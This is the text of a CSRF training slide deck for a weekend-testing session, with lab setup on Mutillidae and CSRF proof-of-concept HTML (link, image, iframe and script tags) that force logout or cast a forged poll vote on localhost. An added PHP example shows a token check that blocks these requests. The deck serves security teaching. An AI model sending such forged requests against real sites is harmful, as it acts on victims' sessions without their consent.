OH NO, WAS THAT CSRF?
Abhinav Sejpal
WHO AM I
I'm a new generation exploratory tester
Researcher & reader in free time
Speaker at Null & OWASP community
Facilitator at Weekend Testing
Crowd Tester (AKA bug bounty hunter)
Reported security vulnerabilities for 50+ unique customers all over the world,
including Apple, Yahoo, Outlook, Adobe, etc.
Proficient at Functional, Usability, Accessibility & Compatibility Testing
Love to develop nasty code & hack it :)
Works as Quality Analyst at passbrains.com
AKA Bug Wrangler
~Publication ~
DISCLAIMER
This presentation is intended for educational purposes only and I cannot be held liable for
any kind of damages done whatsoever to your machine, or other damages.
Please - Don't try this attack on any other system without having context knowledge or
permission; this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purposes.
^ I hope - You gotcha ^
SOCIAL MEDIA FEED
Hashtags for this session: #CSRF, #BitzNightTesting
Twitter handles for feedback: @weekendtesting, @Abhinav_Sejpal
G+: http://goo.gl/kMAOs1
AGENDA
Introduction
Set up Pen Testing LAB
Overview of HTTP Request
Intercept the HTTP Request using Proxy (MITM)
Understanding cross site attacks
Testing for a cross site request forgery risk
Attack Anti-forgery Attacks
Common Defences Against CSRF
SETUP THE TEST LAB
Install XAMPP
Acronym for:
X (to be read as "cross", meaning cross-platform)
Apache HTTP Server
MySQL
PHP
Perl
Why MySQL? It is the girlfriend of PHP
TARGETED APPLICATION
Client-side language: HTML & JavaScript
Server-side language: PHP
DB: MySQL
Why PHP? - Any answer here?
MySQL <3
http://w3techs.com/technologies/overview/programming_lang
PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE
PROGRAMMING LANGUAGE.
PHP: 244M SITES
2.1M IP ADDRESSES
2013 Server-side Programming Language of the Year
Don't mind the power of PHP > Facebook & Yahoo
http://w3techs.com/blog/entry/web_technologies_of_the_year
PLAY GROUND
MUTILLIDAE
It's a free, open source web application provided to allow
security enthusiasts to pen-test and hack a web application.
V.2X developed by Jeremy Druin aka webpwnized.
ALL SET WITH MUTILLIDAE?
AM I VULNERABLE TO 'CSRF' ?
OWASP A8 - CSRF
CROSS-SITE REQUEST FORGERY
Facebook Post
Linkedin Panel
HOW DOES THE WEB WORK?
'Send Request'
Proxy (Man in the middle)
Intercept Request & Response from client
CSRF ATTACK CYCLE
CSRF AKA XSRF
THE ATTACKER EXPLOITS THE TRUST A WEBSITE
HAS IN A USER'S BROWSER.
Permission faking / stealing
Disruption of the normal sequence of the site
DEMO #1
Login ID - admin
password - adminpass
HTTP GET Request
http://127.0.0.1/xampp/mutillidae/index.php?do=logout
<a href= >
: ANSWER DEMO 1 :
<html>
<title> CSRF Demo 1 </title>
<a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a>
</html>
Yes, it's not dangerous but annoying
UNDERSTANDING
Logout page has a simple HTTP GET that requires no
confirmation.
Every user who visited that page would immediately be
logged out - that's CSRF in action.
SO WHAT DO YOU THINK,
IT'S ALL ABOUT CLICK?
ssh, No!!
Would you like to write a CSRF exploit without a click??
CSRF GET Request with Image Tag
<img src= >
<html>
<title> CSRF Demo 1 </title>
<img src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout">
</html>
HTTP REQUEST
<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe>
<script>
var X = new Image();
X.src = "http://127.0.0.1/xampp/mutillidae/index.php?do=logout";
</script>
CHALLENGE #1
<html>
<title> CSRF Demo 1 </title>
<a href= > Click me </a>
</html>
:: SOLUTION #1 ::
http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote
IS IT EASY TO CREATE A CSRF HTTP REQUEST?
No - you should try out IronWASP
CSRF PoC Generator - Tool for automatically generating
exploits for CSRF vulnerabilities
* One Click PoC *
* Hybrid automation *
Thanks a ton to Lava & Jayesh
{ POST HTTP Request }
CHALLENGE  #2
CHALLENGE  #3
Add user without admin's knowledge
LIVE CHALLENGE
* SIGNUP DISABLED *
PLEASE USE THE USERNAME TEST AND THE
PASSWORD TEST
CSRF & XSRF
Update the user info without their knowledge
http://testphp.vulnweb.com/userinfo.php
Can we exploit this with Level #2?
You've been CSRF'd with static token!
Let's try with Level 3
~ Keep Hacking your Code ~
There is no silver bullet to stop this - Just trust your code
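As an added example (not code from the slides or from Mutillidae), the PHP check below shows what a server should have done with the requests in Solution #1 (an empty csrf-token= on a GET) and at Level 2 (a static token), and what Level 3's per-session random token looks like on the server side. The function names and the 'csrf_token' session key are assumptions for this example.

```php
<?php
// Added example, not code from the slides or from Mutillidae.
// A synchronizer-token check for a PHP app like the one in the deck, run
// against the situations the slides walk through:
//   Solution #1 : GET request with an empty csrf-token= parameter
//   Level 2     : a static token that is the same for every user
//   Level 3     : a random per-session token
// Function names and the 'csrf_token' session key are assumptions.
declare(strict_types=1);

const CSRF_TOKEN_BYTES = 32;

// Issue (or reuse) the per-session token that the form echoes back.
// random_bytes() makes it unguessable, which is what Level 2 lacks.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(CSRF_TOKEN_BYTES));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request may proceed.
// Returns [bool $accepted, string $reason].
function validateCsrf(string $method, array $post, array $session): array
{
    // 1. Writes only over POST. A GET such as ?do=logout or the user-poll
    //    URL from Solution #1 is rejected before the token is even read.
    if ($method !== 'POST') {
        return [false, 'state-changing request must use POST'];
    }

    // 2. Both sides must hold a non-empty token. Comparing '' with ''
    //    would succeed, which is exactly the empty csrf-token= bypass.
    $submitted = $post['csrf-token'] ?? '';
    $expected  = $session['csrf_token'] ?? '';
    if ($submitted === '' || $expected === '') {
        return [false, 'missing or empty CSRF token'];
    }

    // 3. Constant-time comparison; known value first, user value second.
    if (!hash_equals($expected, $submitted)) {
        return [false, 'CSRF token mismatch'];
    }
    return [true, 'token valid'];
}

// --- Constructed sessions and requests for the demo ---------------------
$goodSession = [];
$token = issueCsrfToken($goodSession);           // Level 3: random per session
$weakSession = ['csrf_token' => 'static-token']; // Level 2: same for everyone

$cases = [
    'Solution #1: GET, empty token' => ['GET',  ['csrf-token' => '', 'choice' => 'nmap'], $goodSession],
    'POST, empty token'             => ['POST', ['csrf-token' => ''], $goodSession],
    'Level 2: attacker knows token' => ['POST', ['csrf-token' => 'static-token'], $weakSession],
    'Level 3: attacker guesses'     => ['POST', ['csrf-token' => 'static-token'], $goodSession],
    'Level 3: legitimate form post' => ['POST', ['csrf-token' => $token], $goodSession],
];

foreach ($cases as $name => [$method, $post, $session]) {
    [$ok, $reason] = validateCsrf($method, $post, $session);
    printf("%-30s -> %s (%s)\n", $name, $ok ? 'ACCEPT' : 'REJECT', $reason);
}
// Only the 'Level 2' and 'Level 3: legitimate' cases are accepted. The
// Level 2 acceptance is the lesson of the deck: the check itself is fine,
// but a token anyone can predict is no defence, so it must be random and
// bound to the session.
```

Run it with `php` on the command line; no web server or session store is needed because the session is a plain array here.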
POPULAR COOL FINDINGS
Facebook CSRF worth USD 5000 by Amol
GOOGLE GROUPS PROFILE CSRF
Google Account display pic deletion
Facebook Account deactivation
Advanced Learnings - CSRF Token Validation Fail
http://haiderm.com/csrf-token-protection-bypass-methods/
INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU
SHOULD BE FOLLOWING ON TWITTER
Thank you http://garage4hackers.com/ community
- Twitter Folks -
@riyazwalikar, @TroyHunt, @yog3sharma, @makash & @anatshri
CREDITS
Big thank you to @weekendtesting, @srinivasskc & you all.
YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
LICENSE AND COPYRIGHTS
https://slides.com/abhinavsejpal/weekend-testing-csrf
copyrights 2013-2014 Abhinav Sejpal
-----
(CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
  Dedicated to my lovely daddy

Más contenido relacionado

La actualidad más candente

GoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinGoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinIMMUNIO
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equalAri Elias-Bachrach
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesRailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesIMMUNIO
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
 
How to Get Started with Cypress
How to Get Started with CypressHow to Get Started with Cypress
How to Get Started with CypressApplitools
 
State of Web Security RailsConf 2016
State of Web Security RailsConf 2016State of Web Security RailsConf 2016
State of Web Security RailsConf 2016IMMUNIO
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Afterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAfterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAna-Maria Mihalceanu
 
Composer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementComposer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementJoe Ferguson
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Put an end to regression with codeception testing
Put an end to regression with codeception testingPut an end to regression with codeception testing
Put an end to regression with codeception testingJoe Ferguson
 
Midwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamMidwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamJoe Ferguson
 
javascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpjavascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpApoorvi Kapoor
 
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Windows Developer
 
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin DevelopmentAtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Developmentmrdon
 

La actualidad más candente (20)

How i got my first cve
How i got my first cveHow i got my first cve
How i got my first cve
 
GoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinGoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from within
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equal
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesRailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
 
How to Get Started with Cypress
How to Get Started with CypressHow to Get Started with Cypress
How to Get Started with Cypress
 
State of Web Security RailsConf 2016
State of Web Security RailsConf 2016State of Web Security RailsConf 2016
State of Web Security RailsConf 2016
 
ESAPI
ESAPIESAPI
ESAPI
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
 
Afterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAfterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applications
 
Composer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementComposer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency Management
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
Put an end to regression with codeception testing
Put an end to regression with codeception testingPut an end to regression with codeception testing
Put an end to regression with codeception testing
 
Midwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamMidwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small team
 
javascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpjavascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-php
 
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin DevelopmentAtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
 

Destacado

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Desform_emjam
Desform_emjamDesform_emjam
Desform_emjamJun Hu
 
Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Jun Hu
 
Sociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinsSociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinssimongryspeert
 
Facebook voor bestuurders
Facebook voor bestuurdersFacebook voor bestuurders
Facebook voor bestuurderssimongryspeert
 
smart objects and semantic web
smart objects and semantic websmart objects and semantic web
smart objects and semantic webJun Hu
 
World Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniWorld Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniFrancesco Legname
 
Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Rosenborgskole
 
De s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptDe s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptJun Hu
 

Destacado (11)

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Desform_emjam
Desform_emjamDesform_emjam
Desform_emjam
 
Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013
 
Sociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinsSociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwins
 
Vek.od.ua Креатив Перегуд
Vek.od.ua Креатив ПерегудVek.od.ua Креатив Перегуд
Vek.od.ua Креатив Перегуд
 
Facebook voor bestuurders
Facebook voor bestuurdersFacebook voor bestuurders
Facebook voor bestuurders
 
smart objects and semantic web
smart objects and semantic websmart objects and semantic web
smart objects and semantic web
 
World Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniWorld Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - Eni
 
Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Roar Forbords minnecup 2011
Roar Forbords minnecup 2011
 
De s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptDe s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.ppt
 

Similar a Oh no, was that CSRF #Ouch

[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackRan Bar-Zik
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterSquashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterAvi Sharma
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10   exploit development basicsReversing & malware analysis training part 10   exploit development basics
Reversing & malware analysis training part 10 exploit development basicsAbdulrahman Bassam
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMinhaz A V
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018Ken DeSouza
 

Similar a Oh no, was that CSRF #Ouch (20)

[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stack
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterSquashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10   exploit development basicsReversing & malware analysis training part 10   exploit development basics
Reversing & malware analysis training part 10 exploit development basics
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Bettercap
BettercapBettercap
Bettercap
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
Zed Attack Proxy (ZAP)
Zed Attack Proxy (ZAP)Zed Attack Proxy (ZAP)
Zed Attack Proxy (ZAP)
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018
 

Último

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 

Último (20)

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Search Engine Optimization SEO PDF for 2024.pdf
